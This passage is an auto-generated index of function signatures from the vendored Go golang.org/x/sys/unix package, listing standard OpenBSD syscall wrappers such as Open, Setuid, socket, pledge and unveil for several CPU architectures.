pwrite (line 1591) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1612) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1633) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1659) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1685) | func Rename(from string, to string) (err error) { function Renameat (line 1709) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1733) | func Revoke(path string) (err error) { function Rmdir (line 1752) | func Rmdir(path string) (err error) { function Seek (line 1771) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1786) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1801) | func Setegid(egid int) (err error) { function Seteuid (line 1815) | func Seteuid(euid int) (err error) { function Setgid (line 1829) | func Setgid(gid int) (err error) { function Setlogin (line 1843) | func Setlogin(name string) (err error) { function Setpgid (line 1862) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1876) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1890) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1904) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1918) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1932) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setrtable (line 1946) | func Setrtable(rtable int) (err error) { function Setsid (line 1960) | func Setsid() (pid int, err error) { function Settimeofday (line 1975) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1989) | func Setuid(uid int) (err error) { function Stat (line 2003) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 2022) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 2041) | func Symlink(path string, link string) (err error) { function Symlinkat (line 2065) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 2089) | func Sync() (err error) { function Truncate (line 2103) | func Truncate(path string, length int64) (err error) { function Umask (line 2122) | func Umask(newmask int) (oldmask int) { function Unlink (line 2134) | func Unlink(path string) (err error) { function Unlinkat (line 2153) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 2172) | func Unmount(path string, flags int) (err error) { function write (line 2191) | func write(fd int, p []byte) (n int, err error) { function mmap (line 2212) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 2227) | func munmap(addr uintptr, length uintptr) (err error) { function getfsstat (line 2241) | func getfsstat(stat *Statfs_t, bufsize uintptr, flags int) (n int, err e... function utimensat (line 2256) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function pledge (line 2275) | func pledge(promises *byte, execpromises *byte) (err error) { function unveil (line 2289) | func unveil(path *byte, flags *byte) (err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_openbsd_mips64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 32) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 46) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 61) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 76) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 90) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 104) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 119) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 133) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 147) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 161) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 175) | func Shutdown(s int, how int) (err error) { function socketpair (line 189) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 203) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 224) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 244) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 259) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 274) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 289) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 308) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 322) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 337) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 357) | func Mlock(b []byte) (err error) { function Mlockall (line 377) | func Mlockall(flags int) (err error) { function Mprotect (line 391) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 411) | func Msync(b []byte, flags int) (err error) { function Munlock (line 431) | func Munlock(b []byte) (err error) { function Munlockall (line 451) | func Munlockall() (err error) { function pipe2 (line 465) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getdents (line 479) | func Getdents(fd int, buf []byte) (n int, err error) { function Getcwd (line 500) | func Getcwd(buf []byte) (n int, err error) { function getresuid (line 521) | func getresuid(ruid *_C_int, euid *_C_int, suid *_C_int) { function getresgid (line 532) | func getresgid(rgid *_C_int, egid *_C_int, sgid *_C_int) { function ioctl (line 543) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 557) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 567) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function fcntl (line 587) | func fcntl(fd int, cmd int, arg int) (n int, err error) { function fcntlPtr (line 602) | func fcntlPtr(fd int, cmd int, arg unsafe.Pointer) (n int, err error) { function ppoll (line 613) | func ppoll(fds *PollFd, nfds int, timeout *Timespec, sigmask *Sigset_t) ... function Access (line 628) | func Access(path string, mode uint32) (err error) { function Adjtime (line 647) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 661) | func Chdir(path string) (err error) { function Chflags (line 680) | func Chflags(path string, flags int) (err error) { function Chmod (line 699) | func Chmod(path string, mode uint32) (err error) { function Chown (line 718) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 737) | func Chroot(path string) (err error) { function ClockGettime (line 756) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 770) | func Close(fd int) (err error) { function Dup (line 784) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 799) | func Dup2(from int, to int) (err error) { function Dup3 (line 813) | func Dup3(from int, to int, flags int) (err error) { function Exit (line 827) | func Exit(code int) { function Faccessat (line 838) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 857) | func Fchdir(fd int) (err error) { function Fchflags (line 871) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 885) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 899) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 918) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 932) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 951) | func Flock(fd int, how int) (err error) { function Fpathconf (line 965) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 980) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 994) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 1013) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 1027) | func Fsync(fd int) (err error) { function Ftruncate (line 1041) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 1055) | func Getegid() (egid int) { function Geteuid (line 1067) | func Geteuid() (uid int) { function Getgid (line 1079) | func Getgid() (gid int) { function Getpgid (line 1091) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1106) | func Getpgrp() (pgrp int) { function Getpid (line 1118) | func Getpid() (pid int) { function Getppid (line 1130) | func Getppid() (ppid int) { function Getpriority (line 1142) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1157) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrtable (line 1171) | func Getrtable() (rtable int, err error) { function Getrusage (line 1186) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1200) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1215) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1229) | func Getuid() (uid int) { function Issetugid (line 1241) | func Issetugid() (tainted bool) { function Kill (line 1253) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1267) | func Kqueue() (fd int, err error) { function Lchown (line 1282) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1301) | func Link(path string, link string) (err error) { function Linkat (line 1325) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1349) | func Listen(s int, backlog int) (err error) { function Lstat (line 1363) | func Lstat(path string, stat *Stat_t) (err error) { function Mkdir (line 1382) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1401) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1420) | func Mkfifo(path string, mode uint32) (err error) { function Mkfifoat (line 1439) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Mknod (line 1458) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1477) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 1496) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1510) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1530) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1550) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1570) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1591) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1612) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1633) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1659) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1685) | func Rename(from string, to string) (err error) { function Renameat (line 1709) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1733) | func Revoke(path string) (err error) { function Rmdir (line 1752) | func Rmdir(path string) (err error) { function Seek (line 1771) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1786) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1801) | func Setegid(egid int) (err error) { function Seteuid (line 1815) | func Seteuid(euid int) (err error) { function Setgid (line 1829) | func Setgid(gid int) (err error) { function Setlogin (line 1843) | func Setlogin(name string) (err error) { function Setpgid (line 1862) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1876) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1890) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1904) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1918) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1932) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setrtable (line 1946) | func Setrtable(rtable int) (err error) { function Setsid (line 1960) | func Setsid() (pid int, err error) { function Settimeofday (line 1975) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1989) | func Setuid(uid int) (err error) { function Stat (line 2003) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 2022) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 2041) | func Symlink(path string, link string) (err error) { function Symlinkat (line 2065) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 2089) | func Sync() (err error) { function Truncate (line 2103) | func Truncate(path string, length int64) (err error) { function Umask (line 2122) | func Umask(newmask int) (oldmask int) { function Unlink (line 2134) | func Unlink(path string) (err error) { function Unlinkat (line 2153) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 2172) | func Unmount(path string, flags int) (err error) { function write (line 2191) | func write(fd int, p []byte) (n int, err error) { function mmap (line 2212) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 2227) | func munmap(addr uintptr, length uintptr) (err error) { function getfsstat (line 2241) | func getfsstat(stat *Statfs_t, bufsize uintptr, flags int) (n int, err e... function utimensat (line 2256) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function pledge (line 2275) | func pledge(promises *byte, execpromises *byte) (err error) { function unveil (line 2289) | func unveil(path *byte, flags *byte) (err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_openbsd_ppc64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 32) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 46) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 61) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 76) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 90) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 104) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 119) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 133) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 147) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 161) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 175) | func Shutdown(s int, how int) (err error) { function socketpair (line 189) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 203) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 224) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 244) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 259) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 274) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 289) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 308) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 322) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 337) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 357) | func Mlock(b []byte) (err error) { function Mlockall (line 377) | func Mlockall(flags int) (err error) { function Mprotect (line 391) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 411) | func Msync(b []byte, flags int) (err error) { function Munlock (line 431) | func Munlock(b []byte) (err error) { function Munlockall (line 451) | func Munlockall() (err error) { function pipe2 (line 465) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getdents (line 479) | func Getdents(fd int, buf []byte) (n int, err error) { function Getcwd (line 500) | func Getcwd(buf []byte) (n int, err error) { function getresuid (line 521) | func getresuid(ruid *_C_int, euid *_C_int, suid *_C_int) { function getresgid (line 532) | func getresgid(rgid *_C_int, egid *_C_int, sgid *_C_int) { function ioctl (line 543) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 557) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 567) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function fcntl (line 587) | func fcntl(fd int, cmd int, arg int) (n int, err error) { function fcntlPtr (line 602) | func fcntlPtr(fd int, cmd int, arg unsafe.Pointer) (n int, err error) { function ppoll (line 613) | func ppoll(fds *PollFd, nfds int, timeout *Timespec, sigmask *Sigset_t) ... function Access (line 628) | func Access(path string, mode uint32) (err error) { function Adjtime (line 647) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 661) | func Chdir(path string) (err error) { function Chflags (line 680) | func Chflags(path string, flags int) (err error) { function Chmod (line 699) | func Chmod(path string, mode uint32) (err error) { function Chown (line 718) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 737) | func Chroot(path string) (err error) { function ClockGettime (line 756) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 770) | func Close(fd int) (err error) { function Dup (line 784) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 799) | func Dup2(from int, to int) (err error) { function Dup3 (line 813) | func Dup3(from int, to int, flags int) (err error) { function Exit (line 827) | func Exit(code int) { function Faccessat (line 838) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 857) | func Fchdir(fd int) (err error) { function Fchflags (line 871) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 885) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 899) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 918) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 932) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 951) | func Flock(fd int, how int) (err error) { function Fpathconf (line 965) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 980) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 994) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 1013) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 1027) | func Fsync(fd int) (err error) { function Ftruncate (line 1041) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 1055) | func Getegid() (egid int) { function Geteuid (line 1067) | func Geteuid() (uid int) { function Getgid (line 1079) | func Getgid() (gid int) { function Getpgid (line 1091) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1106) | func Getpgrp() (pgrp int) { function Getpid (line 1118) | func Getpid() (pid int) { function Getppid (line 1130) | func Getppid() (ppid int) { function Getpriority (line 1142) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1157) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrtable (line 1171) | func Getrtable() (rtable int, err error) { function Getrusage (line 1186) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1200) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1215) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1229) | func Getuid() (uid int) { function Issetugid (line 1241) | func Issetugid() (tainted bool) { function Kill (line 1253) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1267) | func Kqueue() (fd int, err error) { function Lchown (line 1282) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1301) | func Link(path string, link string) (err error) { function Linkat (line 1325) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1349) | func Listen(s int, backlog int) (err error) { function Lstat (line 1363) | func Lstat(path string, stat *Stat_t) (err error) { function Mkdir (line 1382) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1401) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1420) | func Mkfifo(path string, mode uint32) (err error) { function Mkfifoat (line 1439) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Mknod (line 1458) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1477) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 1496) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1510) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1530) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1550) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1570) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1591) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1612) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1633) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1659) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1685) | func Rename(from string, to string) (err error) { function Renameat (line 1709) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1733) | func Revoke(path string) (err error) { function Rmdir (line 1752) | func Rmdir(path string) (err error) { function Seek (line 1771) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1786) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1801) | func Setegid(egid int) (err error) { function Seteuid (line 1815) | func Seteuid(euid int) (err error) { function Setgid (line 1829) | func Setgid(gid int) (err error) { function Setlogin (line 1843) | func Setlogin(name string) (err error) { function Setpgid (line 1862) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1876) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1890) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1904) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1918) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1932) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setrtable (line 1946) | func Setrtable(rtable int) (err error) { function Setsid (line 1960) | func Setsid() (pid int, err error) { function Settimeofday (line 1975) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1989) | func Setuid(uid int) (err error) { function Stat (line 2003) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 2022) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 2041) | func Symlink(path string, link string) (err error) { function Symlinkat (line 2065) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 2089) | func Sync() (err error) { function Truncate (line 2103) | func Truncate(path string, length int64) (err error) { function Umask (line 2122) | func Umask(newmask int) (oldmask int) { function Unlink (line 2134) | func Unlink(path string) (err error) { function Unlinkat (line 2153) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 2172) | func Unmount(path string, flags int) (err error) { function write (line 2191) | func write(fd int, p []byte) (n int, err error) { function mmap (line 2212) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 2227) | func munmap(addr uintptr, length uintptr) (err error) { function getfsstat (line 2241) | func getfsstat(stat *Statfs_t, bufsize uintptr, flags int) (n int, err e... function utimensat (line 2256) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function pledge (line 2275) | func pledge(promises *byte, execpromises *byte) (err error) { function unveil (line 2289) | func unveil(path *byte, flags *byte) (err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_openbsd_riscv64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 32) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 46) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 61) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 76) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 90) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 104) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 119) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 133) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 147) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 161) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 175) | func Shutdown(s int, how int) (err error) { function socketpair (line 189) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 203) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 224) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 244) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 259) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 274) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 289) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 308) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 322) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 337) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 357) | func Mlock(b []byte) (err error) { function Mlockall (line 377) | func Mlockall(flags int) (err error) { function Mprotect (line 391) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 411) | func Msync(b []byte, flags int) (err error) { function Munlock (line 431) | func Munlock(b []byte) (err error) { function Munlockall (line 451) | func Munlockall() (err error) { function pipe2 (line 465) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getdents (line 479) | func Getdents(fd int, buf []byte) (n int, err error) { function Getcwd (line 500) | func Getcwd(buf []byte) (n int, err error) { function getresuid (line 521) | func getresuid(ruid *_C_int, euid *_C_int, suid *_C_int) { function getresgid (line 532) | func getresgid(rgid *_C_int, egid *_C_int, sgid *_C_int) { function ioctl (line 543) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 557) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 567) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function fcntl (line 587) | func fcntl(fd int, cmd int, arg int) (n int, err error) { function fcntlPtr (line 602) | func fcntlPtr(fd int, cmd int, arg unsafe.Pointer) (n int, err error) { function ppoll (line 613) | func ppoll(fds *PollFd, nfds int, timeout *Timespec, sigmask *Sigset_t) ... function Access (line 628) | func Access(path string, mode uint32) (err error) { function Adjtime (line 647) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 661) | func Chdir(path string) (err error) { function Chflags (line 680) | func Chflags(path string, flags int) (err error) { function Chmod (line 699) | func Chmod(path string, mode uint32) (err error) { function Chown (line 718) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 737) | func Chroot(path string) (err error) { function ClockGettime (line 756) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 770) | func Close(fd int) (err error) { function Dup (line 784) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 799) | func Dup2(from int, to int) (err error) { function Dup3 (line 813) | func Dup3(from int, to int, flags int) (err error) { function Exit (line 827) | func Exit(code int) { function Faccessat (line 838) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 857) | func Fchdir(fd int) (err error) { function Fchflags (line 871) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 885) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 899) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 918) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 932) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 951) | func Flock(fd int, how int) (err error) { function Fpathconf (line 965) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 980) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 994) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 1013) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 1027) | func Fsync(fd int) (err error) { function Ftruncate (line 1041) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 1055) | func Getegid() (egid int) { function Geteuid (line 1067) | func Geteuid() (uid int) { function Getgid (line 1079) | func Getgid() (gid int) { function Getpgid (line 1091) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1106) | func Getpgrp() (pgrp int) { function Getpid (line 1118) | func Getpid() (pid int) { function Getppid (line 1130) | func Getppid() (ppid int) { function Getpriority (line 1142) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1157) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrtable (line 1171) | func Getrtable() (rtable int, err error) { function Getrusage (line 1186) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1200) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1215) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1229) | func Getuid() (uid int) { function Issetugid (line 1241) | func Issetugid() (tainted bool) { function Kill (line 1253) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1267) | func Kqueue() (fd int, err error) { function Lchown (line 1282) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1301) | func Link(path string, link string) (err error) { function Linkat (line 1325) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1349) | func Listen(s int, backlog int) (err error) { function Lstat (line 1363) | func Lstat(path string, stat *Stat_t) (err error) { function Mkdir (line 1382) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1401) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1420) | func Mkfifo(path string, mode uint32) (err error) { function Mkfifoat (line 1439) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Mknod (line 1458) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1477) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 1496) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1510) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1530) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1550) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1570) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1591) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1612) | func read(fd 